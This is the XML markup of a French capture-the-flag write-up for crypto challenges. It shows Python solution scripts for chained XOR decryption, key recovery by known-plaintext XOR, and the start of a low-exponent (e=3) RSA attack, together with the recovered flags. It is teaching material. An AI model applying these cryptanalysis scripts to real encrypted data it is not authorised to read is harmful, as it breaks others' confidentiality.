        <w:t>"msg.txt.enc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>"r"</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ciphered_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>readline</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ciphered_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ciphered_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>'#'</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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>'e'</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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>'e'</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t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>ciphered_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>1</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rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808000"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>ciphered_text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>i</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rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0C0C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le script suivant nous renvoie : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{w0w_x0r_ch41n_v3ry_s3cur3_s0_CTF}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc1951900500"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 150 - Weird cipher</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ce chiffrement XOR prend en paramètre un texte et une clef donnés par l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">’utilisateur. </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enc(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>xrange(</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(msg)):</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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>((</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</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return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"xxxxxxxxxxxx"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'index.html'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'rb'</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content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>read</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enc_content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>enc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'index.html.enc'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'w'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>as</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>f2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>f2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>write</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>enc_content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Nous ne disposons pas de la clef mais on a une petite idée du contenu du fichier chiffré, son extension est .html.enc donc il commence probablement par “&lt;html&gt;”. On tatonne en xorant avec “&lt;html&gt;” afin de retrouver la clef, cela nous ressort "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>p@qR5sC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>", ce qui nous permet de déchiffrer le fichier.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with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"index.html.enc"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'r'</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t>f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>readlines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8000"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>C</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a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"p@qR5sC"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</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rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>range(</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(a)):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>print</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>((</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])^</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]))%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On obtient le contenu du fichier : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{N0_1d3as_f0r_th3_Fl@g}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc1516111964"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 200 - Romain Small Arithmetic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>On remarque tout de suite les initiales du titre RSA d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’autant plus qu’on nous donne une clef publique “public.pem”.  Dans un premier temps on extrait les informations de la clef :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">swissky@crashlab:~/Bureau/rsa$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">openssl rsa -in pub.pem -pubin -text -modulus </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Public-Key: (2048 bit)</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Exponent: 3 (0x3)</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Modulus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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L’exposant est très petit 3, donc on peut faire une attaque sur exposant faible à partir des infos récupérées.</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import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>gmpy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>long</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
